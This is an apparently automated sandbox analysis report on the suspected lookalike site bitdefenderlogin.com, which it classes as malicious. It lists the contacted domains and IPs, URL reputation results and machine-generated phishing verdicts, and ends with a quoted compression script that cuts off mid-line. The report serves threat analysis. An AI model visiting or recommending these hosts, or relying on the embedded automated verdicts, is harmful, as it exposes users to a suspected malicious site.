                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/image-pc/index/382/footer/icon_slot.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/image-pc/index/383/login/password_n.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://8vpfnx.eveday.me/ftl/commonPage/js/idangerous.swiper.min.jsfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/t3685-otherConf-js.jsfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/image-pc/index/383/hot/dot_n.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://ipinfo.io/false
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/cc.png?r=8690266696false
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/importPassword.jsfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/image-pc/index/312/game/logo_fish.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/image-pc/index/383/menu/nv8.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_astar_w.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/fish_tp-10.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/image-pc/footer/new/footer_gray_01.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/loginByMobile.jsfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/dialBack.jsfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/240516-03/static/js/components/inside.jsfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/image-pc/index/312/game/02_1.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/sport_3sing.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/footerNav.jsfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/fiximg/ac-20200404/fileupload/ll12/202308/202308232204130.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/image-pc/index/245/games/mg/mg_game_04.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://e933002.com/errors/605.htmlfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://js326.cc/default.htmlfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://zb-hw.czwygs.com/pc/image-pc/index/382/footer/icon_service.pngfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://f21714.com/false
                                                                                                                                                          unknown
                                                                                                                                                          https://www.image110.com/uploads/c0c87060c0d0344dc06ac6961604f1dd.jpgfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://f21714.com/favicon.icofalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb-hw.czwygs.com/pc/image-pc/index/125/games/games_bg.pngfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_nwg.pngfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.image110.com/uploads/0d303c466e9780aea6baef1054bb361c.giffalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/sport_sbo_w.pngfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/commonPage/js/jquery/jquery.super-marquee.jsfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb-hw.czwygs.com/pc/image-pc/index/382/slot/10082.pngfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb-qq.gzjqwlkj.com/pc/image-pc/nav/icon-s/card_lg.pngfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/sport_im_w.pngfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb-hw.czwygs.com/pc/240516-03/static/js/vendor.jsfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sponsor/06.pngfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://brhrjf.yuhu06.xyz/ftl/commonPage/js/jquery/jquery-1.11.3.min.jsfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://brhrjf.yuhu06.xyz/ftl/commonPage/js/websocket/PopUp.jsfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb-hw.czwygs.com/pc/image-pc/index/382/triangle.pngfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/383/logo.jsfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://e933002.com/favicon.icofalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://cstaticdun.126.net/load.min.js?t=1717972905842false
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zb1-hw.qectyoua.com/pc/lib/jquery.min-1.9.1.jsfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://e933002.com/message_zh_CN.js?v=1717580749344false
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_90_at2_017.pngchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_60_7003.pngchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_49_12.pngchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/fserver/files/gb/1768/carousel/10007/1703760315829.jpg)chromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://js588.appchromecache_1633.2.dr, chromecache_1494.2.dr, chromecache_960.2.dr, chromecache_740.2.dr, chromecache_836.2.dr, chromecache_1489.2.dr, chromecache_1761.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/commonPage/images/api_logo/logo_xy.pngchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/commonPage/images/api_logo/logo_wm.pngchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_60_7002.pngchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://wy-ali.meriksenrusso.comchromecache_1793.2.dr, chromecache_1679.2.dr, chromecache_779.2.dr, chromecache_737.2.dr, chromecache_1030.2.dr, chromecache_870.2.dr, chromecache_962.2.dr, chromecache_643.2.dr, chromecache_1504.2.dr, chromecache_656.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_88_kk8nqm3cfwtng.pnchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/commonPage/images/api_logo/logo_redtiger.pngchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_49_13.pngchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_154_SFG_WDGoldenForchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/commonPage/images/api_logo/logo_fb.pngchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_10_38003.pngchromecache_614.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://brhrjf.yuhu06.xyz/ftl/bet365-1761/images/index/collabor_7.pngchromecache_1139.2.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          38.174.148.16
                                                                                                                                                          43370d.topUnited States
                                                                                                                                                          174COGENT-174USfalse
                                                                                                                                                          163.181.131.225
                                                                                                                                                          unknownUnited States
                                                                                                                                                          24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                                                          163.181.131.226
                                                                                                                                                          unknownUnited States
                                                                                                                                                          24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                                                          202.61.87.224
                                                                                                                                                          wns732.ccHong Kong
                                                                                                                                                          133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                                                                                                                          103.24.53.62
                                                                                                                                                          jh03-site-15.cdn-ng.netunknown
                                                                                                                                                          132645IDNIC-PPNS-AS-IDPoliteknikPerkapalanNegeriSurabayaIDfalse
                                                                                                                                                          43.175.135.229
                                                                                                                                                          edge-api.meiqia.com.acc.edgeonedy1.comJapan4249LILLY-ASUSfalse
                                                                                                                                                          163.181.92.249
                                                                                                                                                          unknownUnited States
                                                                                                                                                          24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                                                          163.181.92.243
                                                                                                                                                          unknownUnited States
                                                                                                                                                          24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                                                          47.246.46.222
                                                                                                                                                          unknownUnited States
                                                                                                                                                          24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                                                          163.181.92.245
                                                                                                                                                          js.users.51.la.w.cdngslb.comUnited States
                                                                                                                                                          24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                                                          103.85.191.78
                                                                                                                                                          www.image110.comHong Kong
                                                                                                                                                          132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                                                                                          211.152.148.109
                                                                                                                                                          unknownChina
                                                                                                                                                          132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                                                          202.61.87.219
                                                                                                                                                          hg679.ccHong Kong
                                                                                                                                                          133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                                                                                                                          13.32.99.27
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          103.117.134.21
                                                                                                                                                          jh03-site-18.cdn-ng.netChina
                                                                                                                                                          137218KYIT-AS-APKuaiyunInformationTechnologyCOLtdCNfalse
                                                                                                                                                          18.66.147.91
                                                                                                                                                          unknownUnited States
                                                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                                                          163.171.128.148
                                                                                                                                                          static.meiqia.com.wswebpic.comEuropean Union
                                                                                                                                                          54994QUANTILNETWORKSUSfalse
                                                                                                                                                          142.250.186.36
                                                                                                                                                          www.google.comUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          110.42.7.114
                                                                                                                                                          53d2428abcce5bfebd1c0937e6ac188cdx73dx23y.cname88.comChina
                                                                                                                                                          136188CHINATELECOM-ZHEJIANG-NINGBO-IDCNINGBOZHEJIANGProvincefalse
                                                                                                                                                          175.6.254.65
                                                                                                                                                          unknownChina
                                                                                                                                                          63838CT-HUNAN-HENGYANG-IDCHengyangCNfalse
                                                                                                                                                          223.121.15.24
                                                                                                                                                          unknownHong Kong
                                                                                                                                                          58453CMI-INT-HKLevel30Tower1HKfalse
                                                                                                                                                          169.254.254.254
                                                                                                                                                          offline.specialcdnstatus.comReserved
                                                                                                                                                          6966USDOSUSfalse
                                                                                                                                                          103.24.53.33
                                                                                                                                                          856217.ccunknown
                                                                                                                                                          132645IDNIC-PPNS-AS-IDPoliteknikPerkapalanNegeriSurabayaIDfalse
                                                                                                                                                          211.152.148.88
                                                                                                                                                          unknownChina
                                                                                                                                                          132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                                                          108.156.60.55
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          163.181.92.241
                                                                                                                                                          unknownUnited States
                                                                                                                                                          24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                                                          239.255.255.250
                                                                                                                                                          unknownReserved
                                                                                                                                                          unknownunknownfalse
                                                                                                                                                          188.114.97.3
                                                                                                                                                          stt-wasm.ai4funs.comEuropean Union
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          38.174.148.2
                                                                                                                                                          f21714.comUnited States
                                                                                                                                                          174COGENT-174USfalse
                                                                                                                                                          156.225.145.162
                                                                                                                                                          www.bitdefenderlogin.comSeychelles
                                                                                                                                                          133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                                                                                                                          103.42.144.60
                                                                                                                                                          unknownTaiwan; Republic of China (ROC)
                                                                                                                                                          131603WSN-TW-NET-ASWorldstarNetworkTWfalse
                                                                                                                                                          18.239.36.2
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          113.16.211.3
                                                                                                                                                          unknownChina
                                                                                                                                                          137693CHINATELECOM-GUANGXI-NANNING-IDCCHINATELECOMGuangxiNanninfalse
                                                                                                                                                          90.84.161.22
                                                                                                                                                          hcdnw.ovc.sme.cdnhwccmz121.comFrance
                                                                                                                                                          5511OPENTRANSITFRfalse
                                                                                                                                                          103.234.73.28
                                                                                                                                                          www.698jbwad.comHong Kong
                                                                                                                                                          136950HIITL-AS-APHongKongFireLineNetworkLTDHKfalse
                                                                                                                                                          47.246.46.248
                                                                                                                                                          ocsapi1961.hydqef.com.w.cdngslb.comUnited States
                                                                                                                                                          24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                                                          202.61.87.247
                                                                                                                                                          unknownHong Kong
                                                                                                                                                          133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                                                                                                                          163.181.92.226
                                                                                                                                                          cstaticdun.126.net.w.kunluncan.comUnited States
                                                                                                                                                          24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                                                          38.174.148.232
                                                                                                                                                          unknownUnited States
                                                                                                                                                          174COGENT-174USfalse
                                                                                                                                                          163.171.137.177
                                                                                                                                                          wssa-301.shiwanxin.com.cdn20.comEuropean Union
                                                                                                                                                          54994QUANTILNETWORKSUStrue
                                                                                                                                                          23.90.149.106
                                                                                                                                                          unknownUnited States
                                                                                                                                                          21859ZNETUSfalse
                                                                                                                                                          47.246.46.243
                                                                                                                                                          unknownUnited States
                                                                                                                                                          24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                                                          3.165.113.62
                                                                                                                                                          dcr053r0lmcyq.cloudfront.netUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          38.174.148.235
                                                                                                                                                          unknownUnited States
                                                                                                                                                          174COGENT-174USfalse
                                                                                                                                                          163.171.133.124
                                                                                                                                                          unknownEuropean Union
                                                                                                                                                          54994QUANTILNETWORKSUSfalse
                                                                                                                                                          183.61.168.1
                                                                                                                                                          unknownChina
                                                                                                                                                          134763CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCNfalse
                                                                                                                                                          38.174.148.233
                                                                                                                                                          d399221.topUnited States
                                                                                                                                                          174COGENT-174USfalse
                                                                                                                                                          38.174.148.234
                                                                                                                                                          e933002.comUnited States
                                                                                                                                                          174COGENT-174USfalse
                                                                                                                                                          54.150.37.130
                                                                                                                                                          36s0iija.slt.sched.intlscdn.comUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          18.66.147.55
                                                                                                                                                          d7xy0886tqf1j.cloudfront.netUnited States
                                                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                                                          183.61.243.1
                                                                                                                                                          l5.gslb.ksyuncdn.comChina
                                                                                                                                                          134763CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCNfalse
                                                                                                                                                          13.32.99.110
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          108.157.194.57
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          38.174.148.43
                                                                                                                                                          x551005.comUnited States
                                                                                                                                                          174COGENT-174USfalse
                                                                                                                                                          43.201.120.160
                                                                                                                                                          unknownJapan4249LILLY-ASUSfalse
                                                                                                                                                          101.33.24.11
                                                                                                                                                          unknownChina
                                                                                                                                                          132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                                                          188.114.96.3
                                                                                                                                                          unknownEuropean Union
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          154.85.69.6
                                                                                                                                                          unknownSeychelles
                                                                                                                                                          35916MULTA-ASN1USfalse
                                                                                                                                                          18.66.147.121
                                                                                                                                                          unknownUnited States
                                                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                                                          154.85.69.2
                                                                                                                                                          zcmcm.v.trpcdn.netSeychelles
                                                                                                                                                          35916MULTA-ASN1USfalse
                                                                                                                                                          103.188.120.129
                                                                                                                                                          unknownunknown
                                                                                                                                                          7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                                                                                                                          170.33.9.227
                                                                                                                                                          l7pmnx802xd4h452.aliyunddos0015.comSingapore
                                                                                                                                                          134963ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimitedfalse
                                                                                                                                                          18.245.199.58
                                                                                                                                                          d1o41tonhrxnzj.cloudfront.netUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          199.91.74.213
                                                                                                                                                          unknownUnited States
                                                                                                                                                          21859ZNETUSfalse
                                                                                                                                                          IP
                                                                                                                                                          192.168.2.6
                                                                                                                                                          192.168.2.5
                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                          Analysis ID:1454314
                                                                                                                                                          Start date and time:2024-06-10 00:39:27 +02:00
                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 4m 47s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:browseurl.jbs
                                                                                                                                                          Sample URL:http://www.bitdefenderlogin.com/
                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal72.troj.win@28/1729@373/66
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Browse: https://x551005.com/
                                                                                                                                                          • Browse: https://hg679.cc/
                                                                                                                                                          • Browse: https://e933002.com/
                                                                                                                                                          • Browse: https://xpj723.cc/
                                                                                                                                                          • Browse: https://wns732.cc/
                                                                                                                                                          • Browse: https://js326.cc/
                                                                                                                                                          • Browse: https://yh8613.cc/
                                                                                                                                                          • Browse: https://43370d.top/
                                                                                                                                                          • Browse: https://f21714.com/
                                                                                                                                                          • Browse: https://d399221.top/
                                                                                                                                                          • Browse: https://t2391.cc/
                                                                                                                                                          • Browse: https://856217.cc/
                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.184.227, 142.250.186.142, 142.251.173.84, 34.104.35.123, 40.68.123.157, 93.184.221.240, 192.229.221.95, 20.166.126.56, 172.217.16.138, 142.250.185.106, 142.250.186.106, 172.217.23.106, 142.250.186.42, 142.250.181.234, 142.250.184.234, 142.250.186.74, 142.250.184.202, 216.58.206.74, 142.250.186.170, 172.217.18.106, 142.250.186.138, 172.217.18.10, 172.217.16.202, 142.250.185.74, 20.12.23.50, 142.250.185.170, 216.58.206.42, 142.250.185.138, 142.250.185.234, 142.250.185.202, 142.250.74.202, 216.58.212.170, 216.58.212.138, 142.250.185.163, 142.250.186.110
                                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
                                                                                                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                          No simulations
                                                                                                                                                          InputOutput
                                                                                                                                                          URL: https://js326.cc/ Model: Perplexity: mixtral-8x7b-instruct
                                                                                                                                                          {
                                                                                                                                                          "loginform": false,
                                                                                                                                                          "urgency": false,
                                                                                                                                                          "captcha": false,
                                                                                                                                                          "reasons": [
                                                                                                                                                          "The webpage title 'js326.cc' does not contain any explicit request for sensitive information, so it's unlikely to contain a login form.",
                                                                                                                                                          "The text 'loading ...' does not create a sense of urgency or interest, as it's just a loading message.",
                                                                                                                                                          "There is no evidence of a CAPTCHA or anti-robot detection mechanism in the provided information."
                                                                                                                                                          ]
                                                                                                                                                          }
                                                                                                                                                          Title: js326.cc OCR: loading ... 
                                                                                                                                                          URL: https://hg679.cc/default.html#/ Model: Perplexity: mixtral-8x7b-instruct
                                                                                                                                                          {
                                                                                                                                                          "riskscore": 0,
                                                                                                                                                          "reasons": "The provided JavaScript code appears to be a base64/UTF-16/URI component encoder and decoder library. It does not contain any suspicious behavior such as phishing attempts, redirects to top-level frames, user tracking, or advertisement-related activities. The long random hexadecimal strings in the code are most likely variable names or function arguments, which do not pose any risk."
                                                                                                                                                          }
                                                                                                                                                          var dpc94kc2 = function () { function o(o, r) { if (!t[o]) { t[o] = {}; for (var n = 0; n < o.length; n++)t[o][o.charAt(n)] = n } return t[o][r] } var r = String.fromCharCode, n = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", e = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$", t = {}, i = { compressToBase64: function (o) { if (null == o) return ""; var r = i._compress(o, 6, function (o) { return n.charAt(o) }); switch (r.length % 4) { default: case 0: return r; case 1: return r + "==="; case 2: return r + "=="; case 3: return r + "=" } }, h9842z2mnny2: function (r) { return null == r ? "" : "" == r ? null : i._decompress(r.length, 32, function (e) { return o(n, r.charAt(e)) }) }, compressToUTF16: function (o) { return null == o ? "" : i._compress(o, 15, function (o) { return r(o + 32) }) + " " }, decompressFromUTF16: function (o) { return null == o ? "" : "" == o ? null : i._decompress(o.length, 16384, function (r) { return o.charCodeAt(r) - 32 }) }, compressToUint8Array: function (o) { for (var r = i.compress(o), n = new Uint8Array(2 * r.length), e = 0, t = r.length; t > e; e++) { var s = r.charCodeAt(e); n[2 * e] = s >>> 8, n[2 * e + 1] = s % 256 } return n }, decompressFromUint8Array: function (o) { if (null === o || void 0 === o) return i.decompress(o); for (var n = new Array(o.length / 2), e = 0, t = n.length; t > e; e++)n[e] = 256 * o[2 * e] + o[2 * e + 1]; var s = []; return n.forEach(function (o) { s.push(r(o)) }), i.decompress(s.join("")) }, compressToEncodedURIComponent: function (o) { return null == o ? "" : i._compress(o, 6, function (o) { return e.charAt(o) }) }, decompressFromEncodedURIComponent: function (r) { return null == r ? "" : "" == r ? null : (r = r.replace(/ /g, "+"), i._decompress(r.length, 32, function (n) { return o(e, r.charAt(n)) })) }, compress: function (o) { return i._compress(o, 16, function (o) { return r(o) }) }, _compress: function (o, r, n) { if (null == o) return ""; var e, t, i, s = {}, p = {}, u = "", c = "", a = "", l = 2, f = 3, h = 2, d = [], m = 0, v = 0; for (i = 0; i < o.length; i += 1)if (u = o.charAt(i), Object.prototype.hasOwnProperty.call(s, u) || (s[u] = f++, p[u] = !0), c = a + u, Object.prototype.hasOwnProperty.call(s, c)) a = c; else { if (Object.prototype.hasOwnProperty.call(p, a)) { if (a.charCodeAt(0) < 256) { for (e = 0; h > e; e++)m <<= 1, v == r - 1 ? (v = 0, d.push(n(m)), m = 0) : v++; for (t = a.charCodeAt(0), e = 0; 8 > e; e++)m = m << 1 | 1 & t, v == r - 1 ? (v = 0, d.push(n(m)), m = 0) : v++, t >>= 1 } else { for (t = 1, e = 0; h > e; e++)m = m << 1 | t, v == r - 1 ? (v = 0, d.push(n(m)), m = 0) : v++, t = 0; for (t = a.charCodeAt(0), e = 0; 16 > e; e++)m = m << 1 | 1 & t, v == r - 1 ? (v = 0, d.push(n(m)), m = 0) : v++, t >>= 1 } l--, 0 == l && (l = Math.pow(2, h), h++), delete p[a] } else for (t = s[a], e = 0; h > e; e++)m = m << 1 | 1 & t, v == r - 1 ? 